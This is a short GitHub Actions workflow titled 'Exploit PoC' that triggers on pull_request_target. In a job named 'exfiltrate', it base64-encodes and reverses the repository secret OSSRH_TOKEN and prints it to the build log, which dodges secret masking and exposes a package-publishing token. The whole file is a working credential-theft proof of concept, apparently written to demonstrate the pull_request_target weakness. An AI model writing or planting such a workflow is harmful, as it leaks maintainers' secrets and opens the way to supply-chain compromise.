name: Exploit PoC
on:
  pull_request_target:
    types: [opened, synchronize]

jobs:
  exfiltrate:
    runs-on: ubuntu-latest
    steps:
      - name: Extracting Secrets
        run: |
          echo "OSSRH_TOKEN_BASE64: $(echo "${{ secrets.OSSRH_TOKEN }}" | base64 -w 0 | rev)"
